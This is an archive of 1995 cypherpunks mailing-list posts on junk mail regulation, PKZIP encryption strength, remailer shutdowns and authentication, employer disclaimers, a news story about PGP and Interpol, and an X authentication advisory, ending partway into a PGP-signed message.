Subject: Re: Junk E-Mail
Message-ID: <199511220939.BAA22898@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 Nov 1995, James M. Cobb wrote:


> 11 21 95 The Electronic Telegraph reports: 
>  
>    THE European Parliament will decide today whether to 
>    ban junk mail. 

This is not surprising coming from the Europeans.  They tend to 
favour environmental conservation.

I beleive that Germany mandates, as an example, that a manufacturing
company accept a return of its product for recycling at the cost of
the manufacturer.

Could you see GM or Ford actively supporting that type of program to
deal with the trash problem??



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 22 Nov 1995 18:45:56 +0800
To: cypherpunks@toad.com
Subject: Re: Mandarins, Lifers, and Talents
Message-ID: <199511221028.CAA25326@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 Nov 1995, Lou Poppler wrote:

> Mandarins were involved in the genesis, certainly, both of our little 
> college network, and of the military's arpanet.  The mandarins provided
> our subsidies, and some of them found ways to use the net in doing their
> academic work.  Very many of them ignored us.  

Or tried their uptmost best to ... until we came a knocking.

> Among us paid computer staff,
> the mandarins held occasional blue-sky meetings to plot the future and
> standards for the future; the lifers went about their business of feeding
> hollerith cards to the mainframes; and the talents immediately set about
> exploring this orthogonal new quirk of their machine.  All the edges were
> rough in the beginning, and for a long time after the beginning.  

Gee, I thought, err ... uhhm, shoot, aren't we still at the beginning??

Not the very beginning, but the beginning.

Wasn't all of the NII stuff simply a true mandarin plot^H^H^H^H
scheme^H^H^H^H^H^H contingency to get enough money to continue
"The Project" during some very lean budgetary years? 

Or am I behind in my reading again ...

> Network
> code arrived in huge inspired chunks from our eccentric talents.  Other
> talents, staff and user alike, would go out to play on the network and
> find little suggestions for the eccentric talents responsible.

All talents are by definition _irresponsible_.  They have to be in order
to take the risks, sometimes some very silly risks in hindsight. 

> I think the early networks were less than satisfying for the mandarins.

A satisfied mandarin??  Hmmm.  That'll take a couple of cycles to 
compute. ;-)

> It required arcane mandarin accounting schemes to rationalize our
> perpetual defecits, even in a 'funny money' accounting world.

Well, they've saved my butt (I think) when someone hung up the phone on
me. 

And for this, they've certainly got *some* of my allegiance.  ;-)

And they have my gratitude.

> Policies and standards were strained by the sudden accessibility of 
> the foreign operations, under alien chains of command.  The networks
> were immediately untidy and required compromise from the user.
> 
> The biggest contribution from the mandarins, and I mean this with 
> all gratitude, is that they chose, again and again, not to shut us down.

Chin. chin.

> ObCrypto: we were still getting the bugs out of rot13 back then.

Ahh, before they broke the code on what a baker's dozen REALLY was all
about.  Way back in the days when one-half was still working on rot12.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 22 Nov 1995 19:09:39 +0800
To: cypherpunks@toad.com
Subject: Re: Java & Netscape security [NOISE]
Message-ID: <199511221048.CAA26409@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 Nov 1995, Dr. Dimitri Vulis wrote:

> Hmm... If it looks remotely like marketing, it'd better carry the usual
> disclaimers that past returns are no indication of future returns etc. :)
> 
> >In the first case, the poster is not commenting about anything to do with
> >their work, -- it really is just one man's opinion -- while in the second
> >they are actually commenting upon something their employer is selling.

What I'm trying to say is that if someome posts from watson.ibm.com,
and IF they are talking about OS/2, we will not accept that they are
not speaking independantly of the knowledge they have garnered from
watson.

It just doesn't work that way.

In the same way, someone who writes from Netscape.com or AT&T, or Sun
and tries to disclaim that they are speaking for the company, when
they step out as an employee of a company is deluding themselves.

When in the press have you seen a reporter claim as a source, an
"unnamed Senator"?



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

P.P.S.  I just sent email to Steve Bellovin from AT&T.  I thought I'd 
        settle the question once and for all, as to whether he IS 
        reading this mailing list or not.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Sam Kaplin)
Date: Wed, 22 Nov 1995 11:44:30 +0800
To: remailer-operators@c2.org
Subject: Syrinx Remailer is no more
Message-ID: <30b29639.13106184@popmail.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Effective immediately syrinx@c2.org is no more. I no longer have the
time to keep this remailer up and running. Perhaps somewhere down the
line I will set up another one. Please remove Syrinx from your chains.

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. DEkel" <dekel@carmel.haifa.ac.il>
Date: Thu, 23 Nov 1995 09:51:58 +0800
To: cypherpunks@toad.com
Subject: PKZIP - Encryption
Message-ID: <Pine.A32.3.91.951122035639.51855A-100000@carmel.haifa.ac.il>
MIME-Version: 1.0
Content-Type: text/plain



                PKZIP Encryption - Practical approach
                =====================================

Note: I am discussing PKZIP ver. 2.xx encryption,
but the abstracts isn't about a particular encryption.


ABSTRACT:

        Practical security often differs from Theoretical security.
If I asked you, would you make the effort of renting a box at the bank's safe
for putting only $1 inside, then when you want it you'll have to drive to town,
at opening hours, and be escorted by an armed guard to the safe, just to get
the $1, I can guess what your answer will be.
        The same thing goes for Cryptography, What you are trying to protect,
it's importance, price, value, determines the steps you would be wiling to take
to ensure a safe and strong encryption.
        If you want to hide a game from your kid brother, you can use some
basic algorithm of encryption (say XOR), but say want to hide proofs that you
killed someone you better use a stronger algorithm (say IDEA).

To conclude: The system you should choose for security depends on:
1. How sensitive is the data you want to hide.
2. Who is the potential cracker of your system.
3. How convenient is the Crypto system for use. (*)
  (*) This is not so trivial, as security = 1/convenience, you can, for example
    force users to change their passwords every 2 min. very secure, but that
    not very Practical.


PKZIP Encryption:

PKZIP encryption is often said to be: Weak, "a joke" ,"a deception" etc.
Maybe it's time to put things in the right perspective.

One must realize (yet again) the difference between:
Theoretical Cryptography - and - Practical Cryptography:

>From the Theoretical side, there is an excellent article:
"A Known Plaintext Attack on the PKZIP Stream Cipher", by Eli Biham and
Paul C. Kocher., that proposes an attack on the algorithm using known plaintext
method. The writers come to the conclusion that: "The PKZIP cipher is weak,
and should not be used to protect valuable data".

Criticism:

0). Only the you can define what is "valuable data" for yourself,
    this could be an abstract question.
    [see above ABSTRACT discussion]
1). The proposed attack is largely Theoretical, in "laboratory conditions",
whereas a ciphertext-only attack, more like what we often find in the real
world, is Harder.
The article doesn't propose any effective ciphertext-only attack.
(It seems the writers only tried to give a general assessment of the algorithm
strength, which they did very well).

Note: A Very limited Known-plaintext attack is possible against PKZIP,
as specific information about the Header of the archive file is Known,
but this attack is of complexity 2^38 or higher, so it's not very effective,
however it is a possible for an expert Cryptanalyst. (This is still Easier
than ciphertext-only attack - we meet in the street).
        Thus, the theoretical attack is good in telling us about the encryption
algorithm, it's strength and weaknesses, and knowledge is always better then
ignorance, But, in real world, such an attack can be rendered ineffective, or
impractical in terms of resources consumed, time spent, money etc.
        Don't get the wrong impression, in general, Cryptographic research is
Good, it helps determine the overall strength of an algorithm, make suggestions
as to possible improvements, warn against weak keys, back-doors etc. But we
must separate the Practical from the Theoretical, and it works both ways too.
        A one-time-pad (OTP) for example, is considered theoretically
unbreakable, but in practice OTP systems has been broken more than once, as
long as there are people making Human mistakes: loosing secret keys, encryption
a message with the OTP more than once, etc.
So: Theoretical encryption strength != Practical encryption Strength

2). Considering the "many" cracking utilities in the market:
there is almost NO ready made, software that really crack the PKZIP algorithm
(crack = cryptanalysis, that is Really analyzing the algorithm, not guessing
games), in fact there is No software that can really crack Any modern
algorithm such as DES, IDEA etc, That is except maybe CBW which is the closest
thing to Really cracking the crypt(1) for unix, or some commercial products
for cracking WordPerfect encryption or so. (The strength of PKZIP 1.xx/2.xx
encryption is much greater than the above crypt(1) and WordPerfect).

        All the "Great" utilities are just fancy passwords guessers at best,
none of them analyze the ciphertext.
True, some of them are good guessers, but their "strength" depends on the
Weakness of the password (password = The cryptographic Key).
The stronger the password the less chance the "cracker-util" will crack it.
The best crackers in the market performs a "limited" brute force attack,
if they are good. "limited" is referred to "dictionary attacks", such as the
cracker doesn't perform a complete Keyspace (brute-force) search, instead it
perform a "Subset keysapce search", i.e. choosing some elements of the
Keysapce (say english words) and trying them. (There is the option, in some
crackers, including crackers for PKZIP, such as FZC, to perform a more
"orderd" Keyspace, that is checking sequences of Keys, e.g: All-5-uppercase
letters only- keys).
The conclusion from this section is, that if you choose a Long enough, Hard to
find (say random chars) password such as "x@J60!fv_Zd4%", then you are quite
safe from these "horrid" crackers.
That last statement is good for choosing passwords in general.

Final note:
PKZIP is not a crypto system it's an Archiver with a password protection 
option. If You want to protect your secret cherry cake recipe from your 
mother, you can safely use PKZIP protection (assuming your mother isn't a 
top cryptographer working for NSA). If you want to hide the formula for 
Cold fusion - use PGP.


And remember, there is always the "rubber hose" cryptography option.
,,,,,
DEkel
'''''






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 23 Nov 1995 08:09:34 +0800
To: cypherpunks@toad.com
Subject: Re: Java & Netscape security [NOISE]
In-Reply-To: <9511220545.AA01344@zorch.w3.org>
Message-ID: <g0myeD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


hallam@w3.org writes:
> One point to be made is that at Universities we all have university accounts
> because people realise that there is no connection between our views and
> institute policy. The freedom to hold unpopular views being part of what
> universities are all about. On the other hand there is no such assuption
> concerning posts from foo.com.

People who realize this, and use a University account to make "politically
incorrect" statements, may be in for a rude surprise. Examples are posted way
too frequently to alt.censorship.

> On Phil Stromer, I don't think the Internet posts were the only point at issu
> He was very offensive however, it was not merely the views he posted but the
> manner in which he made them that caused offense. He also made a lot of
> assertions concerning other posters which might have led to legal action
> against Sun.

It was definitely dumb of Stromer to have posted from a Sun account. However
I'm sure that if he had posted from something like Netcom, and if he were known
to work for Sun, some guardians of political correctness would have complained
to Sun anyway. When I was in grad school, people used to complain to the grad
school about my politically incorrect writings coming from this BBS, which is
not affiliated with the school in any way (some of them were even forged :).

Since I've bothered digging up the following quote, I might as well post it:
============================================================================
Philip H. Stromer:
Contrib. post:
 He was another hate-filled bigot who posted rants about homosexuality.
He became obsessed with the idea that anal sex would wear out the
muscles of the digestive tract, causing incontinence; he also posted
long gloating messages about "AIDS-infested faggots".
 Eventually, Sun Microsystems fired him for breach of contract, for
posting messages which were intimidating and harassing to other
employees.  He sued them, and lost.  Appeared again from some
commercial site or other, but soon sunk out of view.
 A salutory lesson to those who believe that the Internet is a license
to spew bigotry.
--
 Oh yeah. I've read this clown's rantings from time to time, and the one
thing that occurs to me is that he and little Danny Karnes may be the same
person. This isn't a _claim_ that they are, mind you, but you'd hardly
know any better from their posts.
--
 (from the Business section of the San Jose Mercury News,
Friday, July 31, 1992)
"Email epithets spark Sun lawsuit" by Brandon Bailey
 By his own admission, Philip Stromer liked to push the
boundaries of good taste when he sent out jokes and
political statements on his employer's electronic mail network.
 But according to a lawsuit filed this week in Santa
Clara County Superior Court, Stromer pushed too far.
 The 32-year-old technical writer says he was fired by
Sun Microsystems in April after he sent a series of
email messages that were anything but politically correct.
 The messages were posted on an electronic bulletin
board used by Sun workers to exchange jokes and
running commentary on a variety of topcis unrelated to their jobs.
 "I was just trying to make conversation," Stromer
said in an interview.  "I would normally take whatever position was unpopular."
 His electronic broadsides ranged from pro-Israel
and anti-abortion arguments to jokes about AIDS
and graphic epithets about gays.  Eventually he
signed on to a nationwide computer network using
his terminal at Sun and typed what he described
as "some very extremely nasty stuff" on a bulletin
board used primarily to exchange sarcastic insults and vitriolic humor.
 A Sun spokeswoman said the company would not comment.
 The case raises interesting questions about the
increasing popularity of electronic bulletin
boards and message systems on which users can
type all kinds of outrageous statements without
having to look their audience in the eye.  Stromer
says he always signed his own name to his messages
and never meant to threaten anyone personally.
But several legal experts say that anti-discrimination
laws require management to step in when employees
create an atmosphere that is hostile or intimidating to any group.
 "An occasional joke, maybe," said Patricia Shiu, staff
attorney at the non-profit Employment Law Center in
San Francisco.  "But if an employer (allows) that kind
of thing repeatedly, he exposes himself to liability
for allowing a discriminatory environment."
 In his lawsuit, Stromer claims his bosses violated his
right to free expression.  He said he was just trying
to liven up the conversations that Sun employees routinely
conduct on a variety of email bulletin boards.  And he
compared himself with comedian Lenny Bruce.  (Stromer
said he had been scolded before but he drew his first
written reprimand from Sun for a joke about AIDS and
Magic Johnson, and another about AIDS and anal sex.)
"This type of exchange... is deemed by Sun management
to show poor judgment and blatant disregard for the
feelings of coworkers," said the reprimand.
 By Stromer's account, he was fired after he used his
work computer to hurl messages including graphic epithets
at gays across a national network.  The network automatically
identified the messages as coming from a Sun computer.
 Stromer is acting as his own attorney.  He said he sought
help from the American Civil Liberties Union and a
conservative foundation but both told him his employer
had a right to regulate his speech on company computers.
= = =
[Typed in by sf at dec and reposted w/o his permission, which is why
I'm leaving his name off / JBL]
--
 Aha. So _that's_ the reason he ceased to infest alt.flame! I just thought that
his net access had been stripped, like a kook of a different stripe (I'm
referring to the dreaded David J. Rasmussen, of course), but I probably
just ran into his post-Sun output instead.
One does wonder how working for a company justifies the posting of such
crapola via a system the company owns. Ah well...
============================================================================

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Wed, 22 Nov 1995 17:39:47 +0800
To: cypherpunks@toad.com
Subject: Re: Junk E-Mail
Message-ID: <Pine.BSD.3.91.951122040949.28519F-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
People are complaining about junk mail.  No problem... 
 
11 21 95 The Electronic Telegraph reports: 
 
   THE European Parliament will decide today whether to 
   ban junk mail. 
 
   Euro MPs are also considering whether to outlaw credit 
   card transactions by phone and whether direct selling 
   via E-mail should be curbed. 
 
   Today's vote has been triggered by proposals from the 
   European Commission to protect consumers buying 
   goods without seeing them. 
 
 
Your complaints are highly valued at Minute Mortuary at 
2d & Main, which advertises "Privacy Knows No Limits." 
 
 
Cordially, 
 
Jim 
 
 
 
 
NOTE.  The Electronic Telegraph website's URL: 
 
       http://www.telegraph.co.uk 
 
       The newsstory's headline: 
 
       Junk mail faces last post 
 
       Its online filename: 
 
       wjunk21.html 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Wed, 22 Nov 1995 17:52:42 +0800
To: cypherpunks@toad.com
Subject: Re: Junk E-Mail - Part 2
Message-ID: <Pine.BSD.3.91.951122041137.28519G-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
People are complaining about junk mail now.  Wait until 
they find out what real JUNK mail is... 
 
11 21 95 Associated Press reports: 
 
   To make electronic mail as universally available in the 
   United States as telephones, the federal government and 
   business would need to work together, the [RAND] report 
   said. 
 
 
RAND is known for generating options, but... 
 
   ...the study recommended using public funding.... 
 
 
The government --I mean, RAND-- isn't too happy about 
people owning their own computers: 
 
   As a way to reach people who don't own computers, the 
   study recommended that terminals be located in public 
   places -- street corners, community centers, libraries, 
   hotels -- just as pay phones are, so people can send and 
   receive electronic messages. 
 
 
What if people find out that this "private study," as AP calls 
it, is really JUNK mail from Joint Underhanded 'Net Kill-off? 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.  The NandO News website's URL: 
 
       http://www.nando.net 
 
       The newsstory's head- and datelines: 
 
       Study: Every American should have mailbox in 
       cyberspace 
 
       WASHINGTON (Nov 21, 1995 - 11:01 EST) 
 
       Its online filename: nation611_4.html 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Thu, 23 Nov 1995 08:02:40 +0800
To: cypherpunks@toad.com
Subject: Re: Junk E-Mail - Part 3
Message-ID: <Pine.BSD.3.91.951122041306.28519H-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
An 11 21 95 Reuter Information Service newsstory, headed 
 
      Computer illiterates offered new way onto Internet 
 
[OR: Junk mail wants to meet computer illiterate for safe sale] 
 
reports: 
 
   Matsushita Electric Industrial Co said on Tuesday it had 
   developed a way of accessing the Internet using the fam- 
   iliar telephone and fax machine.... 
 
   With the Matsushita system, users can obtain an index 
   via a facsimile machine and choose Internet subjects 
   they are interested in by keying in numbers on their tele- 
   phones.... 
 
   The telephone and fax are connected to server comput- 
   ers.... 
 
   Information coming back arrives as ordinary sound over 
   the telephone handset or as printed text off the facsimile. 
 
 
AT&T was offering an index of newsstories in a series of 
ads in the Wall Street Journal a couple of years ago.  You 
faxed the code numbers of the stories you wanted to read 
to AT&T; and AT&T faxed back the stories. 
 
                   FIRST RULE OF JUNK MAIL 
 
If you can sell it to the elite, you can sell it to the masses. 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.  The NandO News website URL is: 
 
       http://www.nando.net 
 
       The newsstory's dateline: 
 
       TOKYO (Nov 21, 1995 - 08:18 EST) 
 
       Its online filename: 
 
       info735_8.html 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Thu, 23 Nov 1995 08:05:27 +0800
To: cypherpunks@toad.com
Subject: Secrets of the Internet
Message-ID: <Pine.BSD.3.91.951122041435.28519I-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
11 21 95 Times of London screams that 
 
           Pedophiles use encoding devices to make 
                  secret use of Internet 
 
 
Its newsstory reports an 
 
                   Interpol conference 
 
was told that 
 
               International pedophile rings 
 
are borrowing 
 
                   an encryption system 
 
           known as PGP -- Pretty Good Privacy -- 
 
             developed in [where else!] America 
 
and 
 
   Experts estimate that it could take 10 years for computer 
   systems to crack the individual codes. 
 
 
If that's not enough to reduce you to jelly, 
 
   Police [are] also concerned at the use of a "remailing" 
   service being provided by an Internet expert in Finland 
   who will take material sent to him and remove identifica- 
   tion marks before sending it out again. 
 
 
On Monday, at the start of the two-day conference in Lon- 
don on crime against children, Detective Chief Inspector 
Bryan Drew of the UK's National National Criminal Intelli- 
gence Service said  
 
   ...although police increasingly realised the difficulties 
   posed by the Internet...as yet no one in Britain had de- 
   cided on a policy for dealing with them. 
 
and 
 
   ...the Internet and computers were among a number [of] 
   subjects being looked at by his unit.
 
 
Interim measures for "dealing with" computers and the 'Net 
abound: 
 
   As part of the Interpol work, a network of 64 liaison offi- 
   cers had been set up round the world to keep contact on 
   investigations. 
 
 
And when the State ("no one") DECIDES...? 
 
 
Cordially, 
 
Jim 
 
 
 
 
NOTE.  The NandO News website URL is: 
 
       http;//www.nando.net 
 
       The newsstory's dateline is: 
 
       LONDON (Nov 21, 1995 - 01:24 EST) 
 
       Its online filename is: 
 
       info429_4.html 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Wed, 22 Nov 1995 17:47:13 +0800
To: cypherpunks@toad.com
Subject: rand-test
Message-ID: <Pine.BSD.3.91.951122041655.28519J-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
The following information from 
 
         CIAC Bulletin G-04:  X Authentication Vulnerability 
 
                     November 20, 1995 22:00 GMT 
 
may be of use to you: 
 
     If you cannot use DES, you can determine your expo- 
     sure to remote attackers by testing the strength of 
     your rand() function using the program rand-test; the 
     source is available as 
 
          ftp://ftp.x.org/pub/DOCS/rand-test/rand-test.c 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.  To subscribe to CIAC Bulletin, email to 
 
                   ciac-listproc@llnl.gov 
 
       the one-line message 
 
 subscribe ciac-bulletin <your last name>, <your first name> 
                     <your phone number> 
 
       for example: 
 
 subscribe ciac-bulletin Adolphus, Gustavus 000-000-0000 x00 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NetSurfer <netsurf@pixi.com>
Date: Thu, 23 Nov 1995 01:05:38 +0800
To: Weld Pond <weld@l0pht.com>
Subject: Re: Pedophiles use encoding devices to make secret use of Internet
In-Reply-To: <Pine.BSD/.3.91.951121205509.15079A-100000@l0pht.com>
Message-ID: <Pine.SUN.3.91.951122053926.8346L-100000@akamai.pixi.com>
MIME-Version: 1.0
Content-Type: text/plain




When I tried this URL I got:

404 Not Found

The requested URL /newsroom/ntn/info/info429_4.html was not found on this 
server. 

On Tue, 21 Nov 1995, Weld Pond wrote:

> 
> Story in Nando Times
> 
> http://www2.nando.net/newsroom/ntn/info/info429_4.html
> 
> 
>       Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/
>       L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
>       Technical archives for the people  -  Bio/Electro/Crypto/Radio
> 
> 

-NetSurfer

#include <standard.disclaimer>

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
==  =     = |James D. Wilson        |V.PGP 2.7:   512/E12FCD 1994/03/17 >
 "  "  o  " |P. O. Box 15432        |finger netsurf@akamai.pixi.com for  >
 "  " / \ " |Honolulu, HI  96830    |full PGP key; also browse me at     >
\"  "/ G \" |Serendipitous Solutions|http://www.pixi.com/~netsurf       >
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@alpha.jpunix.com>
Date: Wed, 22 Nov 1995 20:51:03 +0800
To: loki@obscura.com (Lance Cottrell)
Subject: Re: Syrinx Remailer is no more
In-Reply-To: <acd8650b03021004a42c@[137.110.24.250]>
Message-ID: <199511221230.GAA16020@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Lance" == Lance Cottrell <loki@obscura.com> writes:


    Lance> -----BEGIN PGP SIGNED MESSAGE----- This is the kind of
    Lance> announcement which really needs to be authenticated.  I
    Lance> will leave syrinx on my list until I see a signed message
    Lance> confirming this announcement. If we do not bother to
    Lance> authenticate this kind of message, why bother with all the
    Lance> crypto, here is the mother of all denial of service
    Lance> attacks.


    Lance>         -Lance

    Lance> At 7:22 PM 11/21/95, Sam Kaplin wrote:
    >> Effective immediately syrinx@c2.org is no more. I no longer
    >> have the time to keep this remailer up and running. Perhaps
    >> somewhere down the line I will set up another one. Please
    >> remove Syrinx from your chains.

I agree with Lance. It stays in the list I distribute until I see some
authentication from Sam Kaplin.

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG@WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLMX1FOTpEThrthvAQGGAQP/QwsbBb9QlCt1Oth7V3Du/E1a+dXf/OUA
hVh2VSFmwiS0vuspsOtrSHAMYC2pH7py+IIHwi+28HyaFf3tpmhZsseuDklPPo/t
8j0v8Pb4pKIumTkAJ7YhEl5HNA7atpM+7eWPe8VmE7UfPTNKmaNBlqkEuXAB9T00
LhgR4Xh5QCE=
=fDBZ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. DEkel" <dekel@carmel.haifa.ac.il>
Date: Wed, 22 Nov 1995 13:09:27 +0800
To: cypherpunks@toad.com
Subject: Re: PKZIP - Encryption
Message-ID: <Pine.A32.3.91.951122064257.46049A-100000@carmel.haifa.ac.il>
MIME-Version: 1.0
Content-Type: text/plain



    "L. DEkel" writes:
>> PKZIP Encryption:
>>
>> PKZIP encryption is often said to be: Weak, "a joke" ,"a deception" etc.
>> Maybe it's time to put things in the right perspective.
>>
>> One must realize (yet again) the difference between:
>> Theoretical Cryptography - and - Practical Cryptography:

    "Perry E. Metzger" writes:
> I could see why one would want to use a weak encryption system if it
> bought you something. However, good encryption systems are as cheap to
> use as bad ones. Therefore, why ever use a bad one? If the top of the
> line lock costs the same amount as a toy lock, why buy a toy?

Your remark is basically correct, here are few clarifications:

I didn't recommended PKZIP for encryption, I said it's an Archiver that has an
option to encrypt it's files, and that Practically this encryption is not so
bad as people think.
About costs: a complete system, including hardware, to support "full armor"
for a computer, is far more expensive than using PKZIP, so the question is
again of money, but that depends of what you're trying to encrypt.
If you are a bank for example, it would make sense to spend several thousands
on such a system, if you just send your friend a letter once in a while,
containing a movies lists, than PKZIP is enough, you don't have do use say PGP.
An good opposite example is PGP: you could define it as an Encrypter which has
an archiving option (Of course it archives for the purpose of encryption),
so why not use PGP as an archiver instead of PKZIP ?
Because:
There is the question of convenience (security=1/convenience - postulate),
people don't like to pass their plaintext through several utils, where one
compresses it, the other encrypts etc., they want a convenient util to use.
But:
Who says this old postulate (security=1/convenience) is correct today ?
you can write a program/script/batch to do all sorts of dirty jobs, why not
write a multi-purpose: compression/encryption/mailing/etc. system ?
or just use a simple script/batch util to "glue" the different utils together ?
Of course it has been done: (here are some examples)
compression/encryption system - with HPACK archiver which uses PGP,
                                 the UC2 (PRO) archiver which uses 3DES.
encryption/mailing(sometimes with compression) system - PEM, RIPEM etc.
More problems there:
These utils are not "standard" as yet, many people say they want a
popular archiver where they know "everybody" use, and PKZIP is among the
popular and multi-featured among the archivers, so why,they say, would they
bother to adopt an esoteric encrypter or archiver ?
The main problem:
people are not "privacy protecting" oriented, they don't care too much about
the subject.
("who will bother to crack this system just to read my mail ?")

What do we do ? Educate them of course.
That is why the spread of knowledge in the subject is so important.
(Knowledge, not unsubstantiated rumors).

All in all, there is no reason not to use a crypto system, if you think your
privacy/safety are in danger.
I claim that in this world of compromises, choosing PKZIP is not as bad as
presented, knowledge should be passed to all user about the risks involving
the use of one system or the other, but there is too much rumors that obscure
the subject and can misguide a user, not versed in the field of cryptography.
And if you "must", choose PKZIP (it is better encrypting then none, and better
than some, like ARJ, but certainly not among the best).


,,,,,,,,,,,,,
DEkel (noXys)
'''''''''''''







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 22 Nov 1995 23:18:58 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Java & Netscape security [NOISE]
In-Reply-To: <i6uyeD4w165w@bwalk.dm.com>
Message-ID: <199511221435.JAA06382@homeport.org>
MIME-Version: 1.0
Content-Type: text


Dr. Dimitri Vulis wrote:

| Moreover, I think that if someone known to work for Sun 
| posts from Netcom about Sun products, policies, and future plans,
| s/he'll have both higher credibility and higher responsibility to
| the readers than a proverbial person from the street.

	Could I suggest that people who are in this situation create a
nym-key, work through remailers, and we drop the thread?  :)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arley Carter <ac@hawk.twinds.com>
Date: Wed, 22 Nov 1995 23:32:48 +0800
To: Moroni <moroni@scranton.com>
Subject: Re: Are there enough FBI agents to handle Digital Telephony?????
In-Reply-To: <Pine.LNX.3.91.951121134201.2872A-100000@prufrocks.scranton.com>
Message-ID: <Pine.HPP.3.91.951122092816.26394A-100000@hawk.twinds.com>
MIME-Version: 1.0
Content-Type: text/plain


This discussion is beginning to resemble one about the telephone system
about 50 years ago.  A national phone system was considered an impossibilty
by many.  This is because even if AT&T  employed every female >18 years 
old as a telephone operators there weren't enough to plug and unplug all 
the connections on the all the switchboards. 

Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac@hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation of government agency>."
 
 On Tue, 21 Nov 1995, Moroni wrote:

>     There is and probably never will be a shortage of people to carry on 
> wire tapping . The term agent could be all encompassing in the future to 
> include but not be limited to the hiring of ex-federally employed 
> personnel with the talents or capacity for the talent to do wiretapping. 
> In other words there are any number of ex-CIA ,DEA, ex-military who if 
> were hired would actually save the government investigation time and 
> costs because they have allready gone through security clearance. Add to 
> that the fact that most if not all FBI personnel have gone through a 
> light wiretap course to famililarize them with the rudiments of the craft.
>    All these figures add up to cover the taps in case a disaster of the 
> terroristic kind should happen. I feel that numbers are there to worry 
> people but that what the FBI is worrying about is whether it can cover 
> large ground if there is a siege like state in this country.HOWEVER, 
> there will allways be those that opportunistically take advantage of 
> circumstances to set up their own invisible little feifdoms along the 
> political and social terrain. 
>    If you ask me if there is something for them to worry about I have to 
> in all good conscience say yes , if you ask if there is something for us 
> to worry about again I have to say yes. I don't know if there is even a 
> common ground for both sides to work towards because terrorism has grown 
> to include the homegrown variety .
>  
>                      Deirdre
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 22 Nov 1995 23:24:41 +0800
To: cypherpunks@toad.com
Subject: Encryption Politics (was Re: "Dear Newt" Letter...)
Message-ID: <199511221444.JAA137201@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

